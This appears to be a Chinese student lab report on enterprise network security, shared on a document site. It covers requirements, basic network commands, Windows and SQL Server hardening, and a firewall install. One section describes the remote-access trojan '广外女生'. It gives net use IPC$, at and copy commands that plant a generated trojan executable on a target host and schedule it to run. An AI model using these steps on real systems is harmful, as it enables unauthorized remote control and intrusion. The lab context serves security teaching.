网络信息安全报告

上传人:桔**** 文档编号:488572378 上传时间:2023-01-31 格式:DOC 页数:10 大小:533KB
返回 下载 相关 举报
网络信息安全报告_第1页
第1页 / 共10页
网络信息安全报告_第2页
第2页 / 共10页
网络信息安全报告_第3页
第3页 / 共10页
网络信息安全报告_第4页
第4页 / 共10页
网络信息安全报告_第5页
第5页 / 共10页
点击查看更多>>
资源描述

《网络信息安全报告》由会员分享,可在线阅读,更多相关《网络信息安全报告(10页珍藏版)》请在金锄头文库上搜索。

1、XX 中型企业网安全网络信息安全报告一、实验目的及要求该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、 防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000 的安全、 Web的安全、网络安全工程以及黑客常用的系统攻击方法。 本课程要求学生对计算机的使用有一定了解 (了解 Windows 的使用,具有键盘操作和文件处理的基础) ,并已经掌握计算机网络的基本原理。二、专周内容1、安全需

2、求分析( 1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:A 、公开服务器的安全保护B、防止黑客从外部攻击C、入侵检测与监控D、病毒防护E、数据安全保护F、网络的安全管理(2)解决网络安全问题的一些要求A 、大幅度地提高系统的安全性(重点是可用性和可控性);B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;E、安全保密系统具有较好的

3、性能价格比。一次性投资,可以长期使用;F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;( 3)系统安全目标A 、建立一套完整可行的网络安全与网络管理策略;B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;2、网络拓扑3、网络安全的基本内容( 1)基本网络命令A 、 ping

4、命令:ping t IP,向指定的计算机不停的发送数据包,按并继续运行,按Ctr+C 可中止运行。Ctr+Break快捷键可以查看统计信息B、 Tracert 命令: tracert IP 显示从本地计算机到目标服务器所经过的计算机:C、 pathping 除了显示路由外,还提供325S 的分析,计算丢失包的%(2)操作系统安全A 、屏蔽不需要的服务组件开始程序管理工具服务出现以下窗口:然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用” ,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享: “开始”“程序”“管理工具”“服务”

5、“Server”(3)数据库系统安全A 、使用安全的帐号策略和Windows 认证模式由于 SQL Server 不能更改 sa 用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然, 包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa 帐号,只有当没有其它方法登录到SQL Server 实例 (例如,当其它系统管理员不可用或忘记了密码)时才使用sa。可以新建立一个拥有与sa 一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。SQL Server 的认证模式有 Windows 身份认证和混合身份认证两种。在任何可能的时候,应该对指

6、向 SQL Server 的连接要求 Windows 身份验证模式。Windows 认证模式比混合模式更优越,原因在以下:1) 它通过限制对MicrosoftWindows 用户和域用户帐户的连接,保护SQL Server免受大部分Internet 工具的侵害。2) 服务器将从 Windows 安全增强机制中获益, 例如更强的身份验证协议以及强制的密码复杂性和过期时间 。3) 使用 Windows 认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server 登录的应用程序的主要漏洞之一。4) Windows 认证意味着你只需要将密码存放在一个地方。要在 SQL Server

7、的 Enterprise Manager 安装 Windows 身份验证模式,步骤操作: 展开服务器组右键点击服务器然后点击“属性”在安全性选项卡的身份验证中点击“仅限 Windows ”。( 4)网络防火墙工具:红墙主机网络防火墙安装1. 具体操作如下:第一步: 将“ 爱思红墙主机网络防火墙 ”的安装光盘插入驱动器,运行根目录下的 Setup 文件来运行其安装程序,进入“ 爱思红墙主机网络防火墙安装 ”窗口;第二步:第三步:第四步:在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;在“软件许可协议”对话框,接受协议点击“是”;点击“是”按钮,出现显示您计算机的相关信息,即判断

8、是否可以安装本软件;第五步:单击“下一步”按钮,出现“选择目标位置”对话框;第六步:在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;第七步:单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;第八步:单击“下一步”按钮,系统开始复制文件;第九步:进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:网

9、络监控中心:(5)网络攻击工具: “广外女生”它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟 WINDOWS 的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便; 屏幕控制方面: 可以自定义图片的质量来减少传输的时间, 在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘, 就像操纵自己的计算机一样; 远程任务管理方面, 可以直观地浏览对方窗体, 随意杀掉对方窗体或其中的控件;其他功能还有邮件 IP 通知等。主要步骤:首先运行“gwg.exe”,出现如图窗口:选中“服务端设置” ,生成“ GDUFS.exe ”

10、木马:然后将“ GDUFS.exe ”复制到自己的C 盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP: 191.168.12.38具体步骤及命令:“开始”“运行”“cmd”命令: net use 191.168.12.38ipc$ 123 /user:administrator与目标主机之间建立联系命令: net time 191.168.12.38获取目标主机的时间命令: at 191.168.12.38 08:21 net share c$=c: 与目标主机的C 盘建立通道命令:copy c:GDUFS.exe191.168.12.38c$复制

11、“GDUFS.exe ”文件到目标主机的C盘中:命令: 191.168.12.38 10:49 c:GDUFS.exe指定“ GDUFS.exe ”在目标主机中什么时候运行。三、专周小结:通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。网络安全分为软件网络安全和硬件网络安全。 一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。网络安全又分为内网安全和外网安全。 在内外网安全中, 内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。至于在将来的工作中, 我们也要严格尊市网络设备管理原则和使用秩序, 对设备进行统一管理专人负责, 严格要求自己对设备进行安全操作, 保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:1, 及时准确判断网络故障, 做好上门维护

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 办公文档 > 活动策划

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号